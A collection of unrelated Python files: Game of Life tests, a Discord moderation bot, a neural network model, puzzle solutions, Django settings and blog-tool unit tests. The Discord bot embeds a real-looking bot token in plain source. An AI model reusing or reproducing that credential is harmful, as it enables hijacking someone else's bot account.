assert conway.get_live_neighbours_count(0, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
assert conway.get_live_neighbours_count(0, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 2
assert conway.get_live_neighbours_count(1, 0, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 3
assert conway.get_live_neighbours_count(1, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 5
assert conway.get_live_neighbours_count(1, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 3
assert conway.get_live_neighbours_count(2, 0, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
assert conway.get_live_neighbours_count(2, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 3
assert conway.get_live_neighbours_count(2, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 2
assert conway.get_live_neighbours_count(3, 0, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 2
assert conway.get_live_neighbours_count(3, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 3
assert conway.get_live_neighbours_count(3, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 2
def test_apply_4_rules():
assert conway.apply_4_rules(0, 0, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
assert conway.apply_4_rules(0, 1, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
assert conway.apply_4_rules(0, 2, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
assert conway.apply_4_rules(1, 0, 3, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
assert conway.apply_4_rules(1, 1, 5, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
assert conway.apply_4_rules(1, 2, 3, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
assert conway.apply_4_rules(2, 0, 1, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
assert conway.apply_4_rules(2, 1, 3, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
assert conway.apply_4_rules(2, 2, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
assert conway.apply_4_rules(3, 0, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
assert conway.apply_4_rules(3, 1, 3, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
assert conway.apply_4_rules(3, 2, 2, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 0
|
import discord
from discord.ext import commands
import discord.utils
from discord.utils import get
import asyncio
import random
import datetime
import json
prefixes = ['!']
bot = commands.Bot(
command_prefix=prefixes,
description='Public testing bot',
owner_id=385432707578069003,
case_insensitive=True
)
# Find and load the .JSON file.
def get_logchannels(bot, message):
with open('logchannels.json', 'r') as f:
channels = json.load(f)
return channels[str(message.guild.id)]
@bot.event
async def on_ready():
print('NapoleonBot Canary Online!')
print('Verison 1.0')
# Set up the .JSON for storing server IDs and channel IDs.
@bot.event
async def on_guild_join(guild):
with open('logchannels.json', 'r') as f:
channels = json.load(f)
channels[str(guild.id)] = '.'
with open('logchannels.json', 'w') as f:
json.dump(channels, f, indent=4)
@bot.event
async def on_guild_remove(guild):
with open('logchannels.json', 'r') as f:
channels = json.load(f)
channels.pop(str(guild.id))
with open('logchannels.json', 'w') as f:
json.dump(channels, f, indent=4)
# Support Commands
@bot.command()
async def display(ctx):
achannel = bot.get_channel(637379670828122130)
channel = bot.get_channel(637423009338228742)
embed = discord.Embed(title="Support desk", description="")
embed.set_author(name="NapoleonBot")
embed.add_field(name=f'Bot is not responding / offline', value='Our servers are down, check {channel.mention}', inline=False)
embed.add_field(name='Inviting NapoleonBot', value='Please visit: https://mierne.weebly.com/releases.html', inline=False)
embed.add_field(name=f'I need support', value='Ping an administrator in {achannel.mention}', inline=False)
embed.set_footer(text="")
await ctx.send(embed=embed)
@bot.command()
async def helpc(ctx):
embed = discord.Embed(title="Help [USAGE]", description="Commands and what they do.")
embed.set_author(name="NapoleonBot")
embed.add_field(name='Help', value='Displays this message', inline=False)
embed.add_field(name='Purge', value='Delets a set amount of messages', inline=False)
embed.add_field(name='Mute', value='Mutes a member', inline=False)
embed.add_field(name='Unmute', value='Unmutes a member', inline=False)
embed.add_field(name='Ban', value='Bans a user', inline=True)
embed.add_field(name='Unban', value='Unbans a user', inline=True)
embed.add_field(name='Kick', value='Kicks a user', inline=True)
embed.set_footer(text="Created by Mierne")
await ctx.send(embed=embed)
# Debug Commands
@bot.command()
async def info(ctx):
User = ctx.message.author
Channel = ctx.message.channel
SentOn = ctx.message.created_at.strftime("%c")
await ctx.send(f'You are {User}, in the {Channel.mention} channel. You asked on: {SentOn}, the server was created on NULL')
@bot.command(pass_context=True)
async def ping(ctx):
await ctx.send(f':ping_pong: Pong! {round(bot.latency * 1000)}ms')
## Fun Commands
@bot.command()
async def say(ctx, *, arg):
await ctx.send(arg)
await ctx.message.delete()
# Moderation commands
@bot.command()
async def kick(ctx, member : discord.Member, *, reason=None):
await member.kick(reason=reason)
mUser = ctx.message.author
log_channel_id = get_logchannels(bot, ctx.message)
if log_channel_id == ".":
mchannel = None
else:
mchannel = bot.get_channel(int(log_channel_id))
mmchannel = ctx.message.channel
timeon = ctx.message.created_at.strftime("%c")
await ctx.send (f'{member} was kicked. for {reason}')
embed = discord.Embed(title="Moderator used command", description="View commands a moderor has used.")
embed.set_author(name="NapoleonBot")
embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
embed.add_field(name='Kicked', value=f'{member.mention}', inline=False)
embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
embed.add_field(name='at', value=f'{timeon}', inline=False)
await mchannel.send(embed=embed)
@bot.command()
async def ban(ctx, member : discord.Member, *, reason=None):
await member.ban(reason=reason)
banned_users = await ctx.guild.bans()
member_name, member_discriminator = member.split('#')
mUser = ctx.message.author
log_channel_id = get_logchannels(bot, ctx.message)
if log_channel_id == ".":
mchannel = None
else:
mchannel = bot.get_channel(int(log_channel_id))
mmchannel = ctx.message.channel
timeon = ctx.message.created_at.strftime("%c")
await ctx.send (f'{member} was banned for {reason}')
embed = discord.Embed(title="Moderator used command", description="View commands a moderor has used.")
embed.set_author(name="NapoleonBot")
embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
embed.add_field(name='Banned', value=f'{member.mention}', inline=False)
embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
embed.add_field(name='at', value=f'{timeon}', inline=False)
await mchannel.send(embed=embed)
@bot.command()
async def unban(ctx, *, member):
banned_users = await ctx.guild.bans()
member_name, member_discriminator = member.split('#')
mUser = ctx.message.author
log_channel_id = get_logchannels(bot, ctx.message)
if log_channel_id == ".":
mchannel = None
else:
mchannel = bot.get_channel(int(log_channel_id))
mmchannel = ctx.message.channel
timeon = ctx.message.created_at.strftime("%c")
for ban_entry in banned_users:
user = ban_entry.user
if (user.name, user.discriminator) == (member_name, member_discriminator):
await ctx.guild.unban(user)
await ctx.send(f'Unbanned {user.mention}')
embed = discord.Embed(title="Moderator used command", description="View commands a moderor has used.")
embed.set_author(name="NapoleonBot")
embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
embed.add_field(name='unbanned', value=f'{member.mention}', inline=False)
embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
embed.add_field(name='at', value=f'{timeon}', inline=False)
await mchannel.send(embed=embed)
return
@bot.command()
@commands.has_permissions(manage_messages=True)
async def purge(ctx, *, amount : int):
mUser = ctx.message.author
log_channel_id = get_logchannels(bot, ctx.message)
if log_channel_id == ".":
mchannel = None
else:
mchannel = bot.get_channel(int(log_channel_id))
mmchannel = ctx.message.channel
x = await mmchannel.purge(limit=amount)
timeon = ctx.message.created_at.strftime("%c")
await ctx.message.channel.purge(limit=amount)
embed = discord.Embed(title="Moderator used command", description="View commands a moderor has used.")
embed.set_author(name="NapoleonBot")
embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
embed.add_field(name='Purged', value=f'{len(x)}', inline=False)
embed.add_field(name='messages in', value=f'{mmchannel}', inline=False)
embed.add_field(name='at', value=f'{timeon}', inline=False)
await mchannel.send(embed=embed)
await ctx.send('Messages purged.', delete_after=5)
@bot.command(pass_context=True)
async def mute(ctx, member : discord.Member, *args):
role = get(member.guild.roles, name="Muted")
rolea = get(member.guild.roles, name="Member")
mUser = ctx.message.author
log_channel_id = get_logchannels(bot, ctx.message)
if log_channel_id == ".":
mchannel = None
else:
mchannel = bot.get_channel(int(log_channel_id))
mmchannel = ctx.message.channel
timeon = ctx.message.created_at.strftime("%c")
if member is None:
await ctx.send('Please pass in a valid user')
return
await member.add_roles(role)
await member.remove_roles(rolea)
await ctx.send(f'{member.mention} was muted!')
embed = discord.Embed(title="Moderator used command", description="View commands a moderor has used.")
embed.set_author(name="NapoleonBot")
embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
embed.add_field(name='Muted', value=f'{member.mention}', inline=False)
embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
embed.add_field(name='at', value=f'{timeon}', inline=False)
await mchannel.send(embed=embed)
@bot.command()
async def unmute(ctx, member : discord.Member, *args):
role = get(member.guild.roles, name="Muted")
rolea = get(member.guild.roles, name="Member")
mUser = ctx.message.author
log_channel_id = get_logchannels(bot, ctx.message)
if log_channel_id == ".":
mchannel = None
else:
mchannel = bot.get_channel(int(log_channel_id))
mmchannel = ctx.message.channel
timeon = ctx.message.created_at.strftime("%c")
if member is None:
await ctx.send('Please pass in a valid user')
return
await member.add_roles(rolea)
await member.remove_roles(role)
await ctx.send(f'{member.mention} was unmuted.')
embed = discord.Embed(title="Moderator used command", description="View commands a moderor has used.")
embed.set_author(name="NapoleonBot")
embed.add_field(name='User', value=f'{mUser.mention}', inline=False)
embed.add_field(name='Unmuted', value=f'{member.mention}', inline=False)
embed.add_field(name='in the channel', value=f'{mmchannel}', inline=False)
embed.add_field(name='at', value=f'{timeon}', inline=False)
await mchannel.send(embed=embed)
@bot.command()
async def logid(ctx, newid):
with open('logchannels.json', 'r') as f:
channels = json.load(f)
channels[str(ctx.guild.id)] = newid
with open('logchannels.json', 'w') as f:
json.dump(channels, f, indent=4)
# token
bot.run('NjM3MzcwODAyNjE3OTc0ODE0.Xc8uxQ.F9fdeWGF354CYx6xDGjZGZDazxE')
|
import api
import ai
import time
toeken = ""
while True:
token = api.login()
while True:
try:
game_id, card = api.begin_game(token)
res = ai.solve(card)
api.play(game_id, res, token)
print("--------比赛结果---------")
time.sleep(1)
# api.get_detail(token,game_id)
api.get_game_list(token)
print("-------------------")
print()
except:
break
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class PairNet(nn.Module):
def __init__(self, dim_in, dim_out):
super(PairNet, self).__init__()
self.fc1 = nn.Linear(dim_in, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, dim_out)
def forward(self, x):
h = F.relu(self.fc1(x))
h = F.relu(self.fc2(h))
out = self.fc3(h)
return out
class TripletNet(nn.Module):
def __init__(self, dim_in, dim_out):
super(TripletNet, self).__init__()
self.fc1 = nn.Linear(dim_in, 1024)
self.fc2 = nn.Linear(1024, 256)
self.fc3 = nn.Linear(256, dim_out)
def forward(self, x):
h = F.relu(self.fc1(x))
h = F.relu(self.fc2(h))
out = self.fc3(h)
return out
class TGNN(nn.Module):
def __init__(self, num_atom_feats, num_bond_feats, dim_target):
super(TGNN, self).__init__()
self.num_atom_feats = num_atom_feats
self.num_bond_feats = num_bond_feats
self.atom_net = nn.Linear(self.num_atom_feats, 128)
self.bond_net = nn.Linear(self.num_bond_feats, 128)
self.pair_net = PairNet(2 * 128 + 128, 1024)
self.triplet_net = TripletNet(3 * 128 + 2 * 128, 1024)
self.fc1 = nn.Linear(2 * 1024 + 1, 512)
self.fc2 = nn.Linear(512, 32)
self.fc3 = nn.Linear(32, dim_target)
def forward(self, pairs, idx_pairs, triplets, idx_triplets, ref_feats):
naf = self.num_atom_feats
nbf = self.num_bond_feats
atom_emb1 = F.relu(self.atom_net(pairs[:, :naf]))
atom_emb2 = F.relu(self.atom_net(pairs[:, naf:2*naf]))
bond_emb = F.relu(self.bond_net(pairs[:, 2*naf:]))
h_pair = self.readout(self.pair_net(torch.cat([atom_emb1, atom_emb2, bond_emb], dim=1)), idx_pairs)
atom_emb1 = F.relu(self.atom_net(triplets[:, :naf]))
atom_emb2 = F.relu(self.atom_net(triplets[:, naf:2*naf]))
atom_emb3 = F.relu(self.atom_net(triplets[:, 2*naf:3*naf]))
bond_emb1 = F.relu(self.bond_net(triplets[:, 3*naf:3*naf+nbf]))
bond_emb2 = F.relu(self.bond_net(triplets[:, 3*naf+nbf:]))
h_triplet = self.readout(self.triplet_net(torch.cat([atom_emb1, atom_emb2, atom_emb3, bond_emb1, bond_emb2], dim=1)), idx_triplets)
h = F.relu(self.fc1(torch.cat([h_pair, h_triplet, ref_feats], dim=1)))
h = F.relu(self.fc2(h))
out = self.fc3(h)
return out
def readout(self, x, idx):
h = torch.empty((idx.shape[0], x.shape[1]), dtype=torch.float).cuda()
pos = 0
for i in range(0, idx.shape[0]):
h[i, :] = torch.mean(x[pos:pos+idx[i], :], dim=0)
pos += idx[i]
return h
|
"""
Given a binary tree, each node has value 0 or 1.
Each root-to-leaf path represents a binary number starting with the most significant bit.
For example, if the path is 0 -> 1 -> 1 -> 0 -> 1, then this could represent 01101 in binary, which is 13.
For all leaves in the tree, consider the numbers represented by the path from the root to that leaf.
Return the sum of these numbers.
Input: [1,0,1,0,1,0,1] -> preorder traversal
Output: 22
Explanation: (100) + (101) + (110) + (111) = 4 + 5 + 6 + 7 = 22
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
def dfs2(node, parent_sum=None):
if parent_sum == None:
parent_sum = 0
if node:
parent_sum = parent_sum * 2 + node.val
if node.left or node.right:
return dfs2(node.left, parent_sum) + dfs2(node.right, parent_sum)
else:
return parent_sum
else:
return 0
class Solution:
def sumRootToLeaf(self, root: TreeNode) -> int:
return dfs2(root) |
# I, Alvin Radoncic, abide by the Stevens Honor Code
# Problem 2, Homework 5
# This program accepts a list of numbers and returns the sum of the numbers.
def summed_list():
number_of_terms = int(input("How many numbers do you want to list? "))
sum = 0
for i in range(number_of_terms):
x = float(input("Enter any number: "))
sum = sum + x
print("The current sum is", sum)
print()
print("The sum of all inputted numbers is: " + str(sum))
summed_list()
|
class Solution:
# @param A : string
# @return an integer
def solve(self, A):
"""
This was simplified by the constraint that you can only add characters to the beginning of
the string, so I'm just checking is the whole string a palindrome, is the string length - 1
a palindrome, and so on, with the characters needed being string length - palindrome length
"""
def is_pal(s):
if len(s) <= 1:
return True
else:
return s[0] == s[-1] and is_pal(s[1:-1])
if len(A) <= 1:
return 0
for i in range(len(A), 0, -1):
if is_pal(A[:i]):
return len(A) - i
|
import os
ADMINS = (
('Przemyslaw Pietrzkiewicz', 'pietrzkiewicz@gmail.com'),
)
MANAGERS = ADMINS
try:
from settings_production import DATABASES
from settings_production import SECRET_KEY
from settings_production import EMAIL_HOST
from settings_production import EMAIL_HOST_USER
from settings_production import EMAIL_HOST_PASSWORD
from settings_production import DEFAULT_FROM_EMAIL
from settings_production import SERVER_EMAIL
from settings_production import EMAIL_USE_TLS
from settings_production import S3BUCKET
PRODUCTION_SETTINGS = True
except ImportError:
from settings_local import DATABASES
from settings_local import SECRET_KEY
PRODUCTION_SETTINGS = False
DEBUG = not PRODUCTION_SETTINGS
TEMPLATE_DEBUG = DEBUG
TIME_ZONE = 'Europe/Warsaw'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
USE_L10N = True
PROJECT_PATH = os.path.abspath(os.path.split(__file__)[0])
MEDIA_ROOT = os.path.join(PROJECT_PATH, "site_media", "upload")
MEDIA_URL = "/site_media/upload/"
STATIC_ROOT = os.path.join(PROJECT_PATH, "site_media", "native")
STATIC_URL = '/site_media/native/'
STATICFILES_DIRS = (
("", os.path.join(PROJECT_PATH, "static")),
("scripts", os.path.join(PROJECT_PATH, "songs", "scripts")),
)
# Make this unique, and don't share it with anybody.
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
if DEBUG:
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
ROOT_URLCONF = 'urls'
FILE_CHARSET = "utf-8-sig"
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'songs.views.songs_context'
)
TEMPLATE_DIRS = (
os.path.join(PROJECT_PATH, "templates"),
)
HAYSTACK_SITECONF = 'search_sites'
HAYSTACK_SEARCH_ENGINE = 'whoosh'
HAYSTACK_WHOOSH_PATH = os.path.join(PROJECT_PATH, "index")
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.staticfiles',
'blog',
'artists',
'songs',
'events',
'users',
'frontpage',
'dxlibrary',
'haystack',
'south',
)
if DEBUG:
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
|
# -*- encoding: utf-8 -*-
import datetime
import os
import unittest
from io import StringIO
from textwrap import dedent
import jinja2
import mocker
from bloggertool.exceptions import FileNotFoundError, UserCancel, ConfigError
from bloggertool.str_util import Template as _
from bloggertool.config import Config
from bloggertool.config.post import Post
class SampleIO(StringIO):
def __init__(self):
super(SampleIO, self).__init__()
self.val = None
def __exit__(self, exc_type, exc_val, exc_tb):
self.val = self.getvalue()
return super(SampleIO, self).__exit__(exc_type, exc_val, exc_tb)
class TestPost(unittest.TestCase):
def setUp(self):
self.config = Config(os.path.abspath('project-root'))
self.post = Post(self.config, 'name', 'dir/file.md')
self.mocker = mocker.Mocker()
self.log = self.mocker.mock()
self.post.log = self.log
self.fs = self.config.fs
self.fs._impl = self.mocker.mock()
self.ask = self.mocker.mock()
self.config._ask = self.ask
def test_ctor(self):
self.assertEqual('name', self.post.name)
self.assertEqual('dir/file.md', self.post.file)
self.assertEqual('name', self.post.slug)
def test_inner_html_path(self):
with self.mocker:
self.assertEqual('dir/file.inner.html', self.post.inner_html_path)
def test_nice_html_path(self):
with self.mocker:
self.assertEqual('dir/file.html', self.post.nice_html_path)
def test_is_html_fresh_inner_not_found(self):
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
self.post.config.fs._impl.exists(full_inner_html_path)
self.mocker.result(False)
with self.mocker:
self.assertFalse(self.post.is_html_fresh)
def test_is_html_fresh_nice_not_found(self):
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
self.post.config.fs._impl.exists(full_inner_html_path)
self.mocker.result(True)
self.post.config.fs._impl.exists(full_nice_html_path)
self.mocker.result(False)
with self.mocker:
self.assertFalse(self.post.is_html_fresh)
def test_is_html_fresh_is_ok(self):
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
self.post.config.fs._impl.exists(full_mdpath)
self.mocker.result(True)
self.post.config.fs._impl.exists(full_inner_html_path)
self.mocker.result(True)
self.mocker.count(2)
self.post.config.fs._impl.exists(full_nice_html_path)
self.mocker.result(True)
self.mocker.count(2)
self.post.config.fs._impl.getmtime(full_mdpath)
self.mocker.result(5)
self.post.config.fs._impl.getmtime(full_inner_html_path)
self.mocker.result(10)
self.post.config.fs._impl.getmtime(full_nice_html_path)
self.mocker.result(15)
with self.mocker:
self.assertTrue(self.post.is_html_fresh)
def test_is_html_fresh_is_inner_expired(self):
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
self.post.config.fs._impl.exists(full_mdpath)
self.mocker.result(True)
self.post.config.fs._impl.exists(full_inner_html_path)
self.mocker.result(True)
self.mocker.count(2)
self.post.config.fs._impl.exists(full_nice_html_path)
self.mocker.result(True)
self.mocker.count(2)
self.post.config.fs._impl.getmtime(full_mdpath)
self.mocker.result(5)
self.post.config.fs._impl.getmtime(full_inner_html_path)
self.mocker.result(1)
self.post.config.fs._impl.getmtime(full_nice_html_path)
self.mocker.result(15)
with self.mocker:
self.assertFalse(self.post.is_html_fresh)
def test_is_html_fresh_is_nice_expired(self):
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
self.post.config.fs._impl.exists(full_mdpath)
self.mocker.result(True)
self.post.config.fs._impl.exists(full_inner_html_path)
self.mocker.result(True)
self.mocker.count(2)
self.post.config.fs._impl.exists(full_nice_html_path)
self.mocker.result(True)
self.mocker.count(2)
self.post.config.fs._impl.getmtime(full_mdpath)
self.mocker.result(5)
self.post.config.fs._impl.getmtime(full_inner_html_path)
self.mocker.result(6)
self.post.config.fs._impl.getmtime(full_nice_html_path)
self.mocker.result(1)
with self.mocker:
self.assertFalse(self.post.is_html_fresh)
def test_refresh_html_fresh(self):
mock = self.mocker.patch(self.post)
mock.is_html_fresh
self.mocker.result(True)
with self.mocker:
self.assertFalse(self.post.refresh_html())
def test_refresh_html_cannot_change_published_slug(self):
self.config.interactive = False
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
self.post.postid = 'some postid'
self.post.config.fs._impl.exists(full_mdpath)
self.mocker.result(True)
self.mocker.count(1, None)
self.config.fs._impl.open(full_mdpath, 'r', 'utf-8')
self.mocker.result(StringIO(dedent(u"""\
Title: Заголовок
slug: article-slug
labels: one, two
three
Текст статьи
""")))
self.log.info('Generate html for name')
with self.mocker:
self.assertRaises(ConfigError, self.post.refresh_html, True)
def test_refresh_html_with_template(self):
self.config.interactive = None
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
self.post.title = self.post.slug = 'garbage'
self.post.labels = ['garbage']
self.ask(mocker.ANY, 'y/N/q')
self.mocker.result('y')
self.mocker.count(3)
self.post.config.fs._impl.exists(full_mdpath)
self.mocker.result(True)
self.mocker.count(1, None)
self.config.fs._impl.open(full_mdpath, 'r', 'utf-8')
self.mocker.result(StringIO(dedent(u"""\
Title: Заголовок
slug: article-slug
labels: one, two
three
Текст статьи
""")))
inner_body = SampleIO()
self.config.fs._impl.open(full_inner_html_path, 'w', 'utf-8')
self.mocker.result(inner_body)
nice_body = SampleIO()
self.config.fs._impl.open(full_nice_html_path, 'w', 'utf-8')
self.mocker.result(nice_body)
self.config.info.template_dir = 'dir'
self.config.info.template_file = 'tmpl'
TEMPLATE = dedent("""\
<html>
<head>
<title>{{title}}</title>
</head>
<body>
<h1>{{title}}</h1>
<p>Slug: {{slug}}</p>
<p>Labels: {{labels}}</p>
<hr>
{{inner}}
</body>
</html>""")
env = jinja2.Environment(loader=jinja2.DictLoader({'tmpl': TEMPLATE}))
self.config.info._template_env = env
self.log.info('Generate html for name')
with self.mocker:
self.assertTrue(self.post.refresh_html(True))
self.assertEqual(u'Заголовок', self.post.title)
self.assertEqual(u'article-slug', self.post.slug)
self.assertEqual(', '.join(sorted(['one', 'two', 'three'])),
self.post.labels_str)
self.assertEqual(u'<p>Текст статьи</p>', inner_body.val)
expected = dedent(u"""\
<html>
<head>
<title>Заголовок</title>
</head>
<body>
<h1>Заголовок</h1>
<p>Slug: article-slug</p>
<p>Labels: [u'one', u'three', u'two']</p>
<hr>
<p>Текст статьи</p>
</body>
</html>""")
self.assertEqual(expected, nice_body.val)
def test_refresh_html_without_template(self):
self.config.interactive = None
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
self.post.title = self.post.slug = 'garbage'
self.post.labels = ['garbage']
self.ask(mocker.ANY, 'y/N/q')
self.mocker.result('y')
self.mocker.count(3)
self.post.config.fs._impl.exists(full_mdpath)
self.mocker.result(True)
self.mocker.count(1, None)
self.config.fs._impl.open(full_mdpath, 'r', 'utf-8')
self.mocker.result(StringIO(dedent(u"""\
Title: Заголовок
slug: article-slug
labels: one, two
three
Текст статьи
""")))
inner_body = SampleIO()
self.config.fs._impl.open(full_inner_html_path, 'w', 'utf-8')
self.mocker.result(inner_body)
nice_body = SampleIO()
self.config.fs._impl.open(full_nice_html_path, 'w', 'utf-8')
self.mocker.result(nice_body)
self.log.info('Generate html for name')
self.log.warning("User settings has no template specified.\n"
"Use markdown output as html.")
with self.mocker:
self.assertTrue(self.post.refresh_html(True))
self.assertEqual(u'Заголовок', self.post.title)
self.assertEqual(u'article-slug', self.post.slug)
self.assertEqual(', '.join(sorted(['one', 'two', 'three'])),
self.post.labels_str)
self.assertEqual(u'<p>Текст статьи</p>', inner_body.val)
self.assertEqual(u'<p>Текст статьи</p>', nice_body.val)
def test_inner_html(self):
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
mock = self.mocker.patch(self.post)
mock.refresh_html(False)
self.mocker.result(False)
self.post.config.fs._impl.exists(full_inner_html_path)
self.mocker.result(True)
self.mocker.count(1, None)
self.config.fs._impl.open(full_inner_html_path, 'r', 'utf-8')
self.mocker.result(StringIO(u'<p>Текст статьи</p>'))
with self.mocker:
self.assertEqual(u'<p>Текст статьи</p>',
self.post.inner_html())
def test_nice_html(self):
full_mdpath = os.path.join(self.fs.root, 'dir/file.md')
full_inner_html_path = os.path.join(self.fs.root,
'dir/file.inner.html')
full_nice_html_path = os.path.join(self.fs.root, 'dir/file.html')
mock = self.mocker.patch(self.post)
mock.refresh_html(True)
self.mocker.result(True)
self.post.config.fs._impl.exists(full_nice_html_path)
self.mocker.result(True)
self.mocker.count(1, None)
self.config.fs._impl.open(full_nice_html_path, 'r', 'utf-8')
self.mocker.result(StringIO(u'<p>Текст статьи</p>'))
with self.mocker:
self.assertEqual(u'<p>Текст статьи</p>',
self.post.nice_html(True))
def test_overwrite_attr_not_changed(self):
self.post.slug = 'slug'
with self.mocker:
self.post.overwrite_attr('slug', 'slug')
self.assertEqual('slug', self.post.slug)
def test_overwrite_attr_empty(self):
self.config.interactive = True
self.post.slug = ''
with self.mocker:
self.post.overwrite_attr('slug', 'slug2')
self.assertEqual('slug2', self.post.slug)
def test_overwrite_attr_no(self):
self.config.interactive = False
self.post.slug = 'slug'
self.log.warning(u'Skip slug modification for name')
with self.mocker:
self.post.overwrite_attr('slug', 'slug2')
self.assertEqual('slug', self.post.slug)
def test_overwrite_attr_yes(self):
self.config.interactive = True
self.post.slug = 'slug'
with self.mocker:
self.post.overwrite_attr('slug', 'slug2')
self.assertEqual('slug2', self.post.slug)
def test_overwrite_attr_interactive_yes(self):
self.config.interactive = None
self.post.slug = 'slug'
self.ask(_("""
New slug: slug2
is different from existing slug: slug
for post name
Do you like to override?"""), 'y/N/q')
self.mocker.result('y')
with self.mocker:
self.post.overwrite_attr('slug', 'slug2')
self.assertEqual('slug2', self.post.slug)
def test_overwrite_attr_interactive_no(self):
self.config.interactive = None
self.post.slug = 'slug'
self.ask(_("""
New slug: slug2
is different from existing slug: slug
for post name
Do you like to override?"""), 'y/N/q')
self.mocker.result('n')
self.log.warning('Skip slug modification for name')
with self.mocker:
self.post.overwrite_attr('slug', 'slug2')
self.assertEqual('slug', self.post.slug)
def test_overwrite_attr_interactive_quit(self):
self.config.interactive = None
self.post.slug = 'slug'
self.ask(_("""
New slug: slug2
is different from existing slug: slug
for post name
Do you like to override?"""), 'y/N/q')
self.mocker.result('q')
with self.mocker:
self.assertRaises(UserCancel, self.post.overwrite_attr,
'slug', 'slug2')
def fill_post(self):
self.post.title = 'Post Title'
self.post.link = 'link'
self.post.labels = ['a', 'b']
self.post.postid = 'postid'
#self.localstamp = datetime.datetime(2011, 2, 21, 22, 32, 05)
def test_info_list_not_changed_short(self):
self.fill_post()
self.post.changed = False
with self.mocker:
self.assertEqual('name', self.post.info_list(False))
def test_info_list_changed_short(self):
self.fill_post()
self.post.changed = True
with self.mocker:
